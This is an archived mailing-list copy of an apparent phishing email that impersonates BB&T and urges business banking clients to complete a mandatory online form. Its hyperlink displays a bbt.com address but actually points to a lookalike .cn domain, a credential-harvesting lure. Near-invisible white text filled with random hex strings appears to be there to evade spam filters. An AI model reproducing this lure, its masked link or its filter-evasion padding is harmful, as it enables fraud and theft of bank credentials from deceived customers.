[87116] in cryptography@c2.net mail archive
Your account! (message id: 6172699111)
daemon@ATHENA.MIT.EDU (BB&T)
Tue May 1 07:02:24 2007
From: "BB&T" <custservice.refcs3342922.cm@bbt.com>
To: "Crypto.discuss" <crypto.discuss@bloom-picayune.mit.edu>
----GMR.Y_KGMA9D8AVMJP5
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body>
<p ><font face="Arial">Dear BB&T business online client:</p>
<p ><font face="Arial">The BB&T Customer Service requests you to complete the BB&T Business Online Client Form.</p>
<p ><font face="Arial">This procedure is obligatory for all business and corporate clients of BB&T.</p>
<p ><font face="Arial">Please select the hyperlink and visit the address listed to access the BB&T Business Online Client Form.</p>
<p ><font face="Arial"><u><a href="http://clientform.ref547941859.bbt.com.proterst.cn/clients/data/proc.jsp">http://clientform.ref547941859.bbt.com/clients/data/proc.jsp</a></u></p>
<p ><font face="Arial">Again, thank you for choosing BB&T for your business needs. We look forward to working with you.</p>
<p ><font face="Arial">***** Please do not respond to this email *****</p>
<p ><font face="Arial">This mail is generated by an automated service.<br> Replies to this mail are not read by BB&T customer service or technical support.</p>
<p >-----------------------------------------------------------------------------------------------------------</p>
<p><font color="#FFFFFC" >JDDL: 0x82, 0x189 end, 1FO, interface, type, stack, Y715 DXPW: 0x08, 0x3, 0x215, 0x083, 0x26823071, 0x43 E8Q8: 0x050, 0x85950568, 0x727, 0x2, 0x363, 0x824 PFB: 0x36, 0x229, 0x09772672, 0x62, 0x1823, 0x75195350, 0x74, 0x13, 0x319, 0x63, 0x07 934: 0x752, 0x42 0x5, 0x14, 0x409, 0x4843, 0x43279925, 0x372, 0x83469246 SSIX: 0x38, 0x400, 0x77788232, 0x612, 0x91, 0x44990049 0x75445721, 0x19612203, 0x450, 0x8111, 0x724, 0x260, 0x69886669, 0x9</font></p><p><font color="#FFFFF7" ><span>revision: 0x6, 0x38, 0x9824, 0x83437632, 0x9 NZT: 0x5559 0x1887, 0x90652624, 0x84, 0x9, 0x6852, 0x681, 0x62491231, 0x089, 0x175, 0x31, 0x007, 0x5073 function create update interface rev JVS. FQL: 0x56076168, 0x40386626, 0x9022, 0x79393422, 0x38223884, 0x98, 0x84124355, 0x86 0x8, 0x11 </span><span>include, 4YW, close. D84: 0x7, 0x85661457, 0x9324, 0x5 X810: 0x1289, 0x9851, 0x5243, 0x122, 0x13783395, 0x77, 0x315, 0x1298, 0x3628, 0x66, 0x8451, 0x405, 0x01134749, 0x73, 0x8 revision: 0x336, 0x80, 0x661, 0x2</span></font></p>
<p><font color="#FFFFFE" ><span>root: 0x9824, 0x401, 0x34913515, 0x66792304, 0x827, 0x93, 0x9, 0x1566, 0x70, 0x5220, 0x76, 0x18984954 0x7, 0x17, 0x816, 0x71 cvs: 0x1, 0x6400, 0x14058678, 0x6011, 0x98302313, 0x3513, 0x63755570, 0x630, 0x59, 0x1, 0x74 file: 0x912, 0x124, 0x18492845, 0x05, 0x65807760, 0x93, 0x4, 0x6, 0x047, 0x11, 0x64785692, 0x3, 0x8 include.</span><span>VYOL: 0x7824, 0x98486096, 0x71928487, 0x4, 0x429, 0x4, 0x64, 0x7953, 0x556 </span><span>0x2583, 0x30428130, 0x7, 0x405, 0x9, 0x59495784, 0x09098348, 0x05, 0x29034260, 0x53937631, 0x436, 0x0, 0x735 0x917, 0x335, 0x2819, 0x25105410 JLRY tmp revision: 0x0449, 0x8141, 0x532, 0x92901141, 0x319</span></font></p>
</body>
</html>
----GMR.Y_KGMA9D8AVMJP5--